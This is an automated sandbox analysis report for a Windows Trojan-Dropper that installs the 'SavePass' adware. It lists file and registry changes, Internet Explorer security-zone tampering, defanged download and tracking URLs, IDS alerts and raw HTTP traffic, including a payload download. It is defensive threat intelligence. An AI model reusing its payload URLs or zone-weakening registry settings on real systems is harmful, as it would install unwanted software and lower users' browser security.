Gen.Variant.Adware.Zusy.127996_a0a59f72f2
Trojan-Dropper.Win32.Agent.peok (Kaspersky), Gen:Variant.Adware.Zusy.127996 (B) (Emsisoft), Gen:Variant.Adware.Zusy.127996 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Adware
This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: a0a59f72f2bbe495c7b4314a34f5b16c
SHA1: 8757838e8c142167819d54ce4f83796f136eb8c5
SHA256: a76002410292e9b7481b5a7d9465eadb66cda025a8d6c7fcb76e2636a61500b6
SSDeep: 6144:68yWGSreo5tSQDV2AOeJirGX0wLDcDqyvF0N6McKDm6WKR9Ula3:VtHSJFrGX0KDg0N6IDm6/R3
Size: 212384 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-01 20:46:10
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Dropper: a Trojan program intended for the stealthy installation of other malware on the user's system.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Ywuovtbypk.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (0 bytes)
The process e33a47b.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (0 bytes)
The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
Registry activity
The process Ywuovtbypk.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"Publisher" = "OB"
"UninstallString" = "%Program Files%\SavePass 1.1\Uninstall.exe /fcp=1 /runexe='%Program Files%\SavePass 1.1\UninstallBrw.exe' /url='http://static.gonotiftime.com/notf_sys/index.html' /brwtype='uni' /onerrorexe='%Program Files%\SavePass 1.1\utils.exe' /crregname='SavePass 1.1' /appid='69829' /srcid='001504' /bic='C54C51C1259F4E0794ABE2EFF455B67AIE' /verifier='c86f1da5444bc59351fec9b57e5afa7b' /brwshtoms='15000' /installerversion='1_36_01_22' /statsdomain='http://stats.ourinputdatastorage.com/utility.gif?' /errorsdomain='http://errors.ourinputdatastorage.com/utility.gif?' /monetizationdomain='http://logs.ourinputdatastorage.com/monetization.gif?'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrPublisherId" = "29777"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayName" = "SavePass 1.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayIcon" = "%Program Files%\SavePass 1.1\utils.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"
[HKCU\Software\InstalledBrowserExtensions\OB]
"69829" = "SavePass 1.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 C9 AC DD 1B F6 C2 52 AD 8A FE 5D 1D 44 87 3F"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrAppId" = "69829"
"DisplayVersion" = "1.36.01.22"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"
[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots in their name that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process e33a47b.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"11995.bat" = "11995"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A E8 3D CB 24 78 19 E9 9B 7B 5C B4 29 E1 3F 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"
[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots in their name that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E C3 29 8D 82 74 05 92 B8 30 E7 36 92 D9 B5 9B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"e33a47b.exe" = "e33a47b"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots in their name that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process ping.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 77 FD 17 B7 8D 44 DE 70 E1 F9 90 1A EF CD AA"
The process ping.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 9C 56 85 AA C2 8B 90 C1 DE 0C CC 7B A9 DA"
The process ping.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 94 0E D9 68 6B E4 02 14 F9 CC 3F 87 6A A5 62"
The process ping.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C D7 54 5C 5E FF 86 86 D2 1D 20 33 81 0E 5D C7"
The process ping.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 BC 8C 76 44 E5 13 A7 81 C1 BF BA 58 4D 70 0C"
The process ping.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 4B 8E 9B A1 60 70 61 5F 21 60 18 24 8B 40 2A"
The process ping.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 61 04 DA 01 85 AE F8 B1 44 FF 55 ED E5 DA 77"
The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 27 B9 3B 09 2D 54 E8 B9 35 22 67 C4 A8 5C 6A"
The process ping.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 91 1F 9A B0 F3 C7 60 4B 1F F5 66 06 0B E7 35"
Dropped PE files
| MD5 | File path |
|---|---|
| 72d181e3089d6eee4c1f81c1b13ea88c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a |
| efc6d4bd8ac2e791549143ed7dc39d39 | c:\Program Files\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe |
| 0374c8fec0166143ddad92c34878adf8 | c:\Program Files\SavePass 1.1\Uninstall.exe |
| 6860cb0759479d5b028812cf6a24f9d2 | c:\Program Files\SavePass 1.1\UninstallBrw.exe |
| 4b47189b70d27324629908716d40ac7d | c:\Program Files\SavePass 1.1\utils.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 347 | 512 | 2.72762 | bd24fddc16367e94a0e4291cdc13185a |
| .rdata | 8192 | 366 | 512 | 2.4907 | ae9775f4ec0f9ea8215ac0d0005da1bf |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 | |
| hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_e | |
| hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 | |
| hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 | |
| hxxp://logs.ourinputdatastorage.com/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 | |
| hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_c | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
Traffic
GET /monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 HTTP/1.1
Host: logs.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:24:07 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1425597847.dop003.fr7.t,1425597847.cds021.fr7.cGIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 05 Mar
2015 23:24:07 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
5..Content-Type: image/gif..X-HW: 1425597847.dop003.fr7.t,1425597847.c
ds021.fr7.c..GIF89a.............,...........D..;..
GET /outil/fuully/styi2/setup.exe_e HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425462000"
Last-Modified: Wed, 04 Mar 2015 09:40:00 GMT
Cache-Control: max-age=2511
Content-Length: 2530648
Content-Type: text/plain
X-HW: 1425597835.dop001.fr7.t,1425597835.cds033.fr7.sr,1425597834.dop005.dc1.r,1425597835.cds023.dc1.c,1425597835.cds033.fr7.pr..m.8_...u.>6.....n8..H...v......r....'.....x.8..F.LJ~&Q...z..>U
.......[[email protected]....$^..1.'...g9....:<.k>...(..fB...`7...r.......
Q.:7Qiq.<..f\........WH.....m.F...Nu......O..\.m.UA$.T})_.fV}...M..
J...7....F...o...l.<...a.d..D..3...(E.T\6.>.45..'.~.4...g..F....
&.3y1b..}[email protected]......<[email protected]..}Z
...........wu.c...W..Y(6Fd....ye..........j8.j.e...v.M...:;..Q. I..E..
...o...].|.[.8%L...$.]>...5.....F.J.......3-\.;.C.<..v..)....?.{
.(c._.7t..Y...b..O.....-0...8... |..h..WU'h..1.w..h.....s.H.\8........
..~......j.sd...$._...G...9.c>.b.vh..*.r...%,..7W(.m. h...i....7..I
.U...7.c.T..&Z(.vO.r9u....4.V...-.,|C...~....N..z....V.OB$[....E.<{
......^...h..)..{A2ZE.\..Y.aq.'.. ...]..x.n.....Z...:.S.....v......l..
.C...:..oa.@.. .....'..Z.<f.....^.r;.;..'..'...G...hR.Uh.Y.........
^.g...Kx..|z....{-.k/`.....qjds.....^Xc ....#z..7_.<~,o.. ..x..t<
;.. [email protected]./..|.r.e.g&r.5....~?.0"2[S#......[..9...*8d.$2Xr.....G \..y
....P.e.. C6p.b..'h.`....@c.:.[...[......92.=>?.hA.d..Ho*..r.-..:..
..!s.L'8..... .W...1.I......>O.4....D...!...7$..e..)..s....a.V.=...
..[#oyV.......&.b..N.I....}..aS...l.Nhji........6.........9,..|..d....
.|{....H..........A].q..>..f1c..jv3.....'.*..'Q....;lr..T"......'.X
.>3.^.7.I..6Y...8..-.w.9.4h..$2.yK............S~.a>.z....5...$..
. .=..,.~.....y/iMs.W....h.b..........D......B.....$.3....E~h.h....g..
..o.0#.....M..cNUiC6}..{........WlC./...<R.Q.IAH._..*...q<.D...e
[email protected][email protected]..(.X..<<< skipped >>>
